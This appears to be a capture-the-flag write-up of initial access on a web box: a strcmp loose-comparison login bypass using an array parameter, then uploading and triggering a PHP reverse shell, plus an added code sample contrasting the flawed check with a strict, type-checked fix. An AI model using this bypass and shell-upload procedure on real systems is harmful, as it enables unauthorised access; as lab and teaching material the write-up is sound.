http [Initial-access]

Looking at the hidden directory

In /login directory
I found that there are three files in the login directory. Upon checking the login.php.swp file, I found the logic used behind the login page. They have used the strcmp function with loose comparison.

Checking the code of login.php.swp

Reading code:


We can see that the strcmp function is used here.
I found a method to bypass it.

Intercepting the request.

In the code analysis, I saw that "root" is mentioned in the code. I am assuming that is the username and will try to log in with it. I will also change the parameter value to an array by adding square brackets to it.

Now forward the request.
When I forwarded the request, we got the upload file directory.
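
The flaw described above next to a corrected check, as an added example (this is not the code from login.php.swp, which is not reproduced on this page). The function names, the `password` parameter name and the stored value are assumptions made for illustration.

```php
<?php
// Constructed sample value; the real credential is not shown on the page.
const STORED_PASSWORD = 'example-stored-password';

// Weak pattern: strcmp() result tested with loose "==".
// On PHP 5/7, strcmp() given an array emits a warning and returns NULL,
// and NULL == 0 is true, so the check passes without the password.
// PHP 8 throws a TypeError for the array argument instead.
function check_loose($input): bool
{
    return @strcmp($input, STORED_PASSWORD) == 0;
}

// Corrected pattern: validate the type first, then compare strictly.
function check_strict($input): bool
{
    // A request field sent as password[]=x arrives as an array; reject it.
    if (!is_string($input)) {
        return false;
    }
    // hash_equals() returns a real bool and compares in constant time.
    // With stored hashes, password_verify() is the usual choice.
    return hash_equals(STORED_PASSWORD, $input);
}

// Constructed inputs standing in for the submitted (hypothetical) password field.
$cases = [
    'correct string'       => STORED_PASSWORD,
    'wrong string'         => 'guess',
    'array (password[]=x)' => ['x'],
];

foreach ($cases as $label => $input) {
    try {
        $loose = check_loose($input) ? 'accept' : 'reject';
    } catch (TypeError $e) {
        $loose = 'TypeError (PHP 8+)';
    }
    $strict = check_strict($input) ? 'accept' : 'reject';
    printf("%-22s loose=%-20s strict=%s\n", $label, $loose, $strict);
}
```

The fix is the type check plus a comparison that returns a boolean; a warning or 500 response for an array-valued login field in the web server logs is also a useful detection signal.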

Uploading PHP for initial access
Now I will upload a PHP reverse shell for initial access.
Made the shell.php using the revshell.com website.

Upload this file.

I know that the upload directory is present at "_uploaded", as found using gobuster initially.

I can see my file. I will first start a listener and then click on the shell.php to access it.

I got the shell.

Stabilizing the shell.
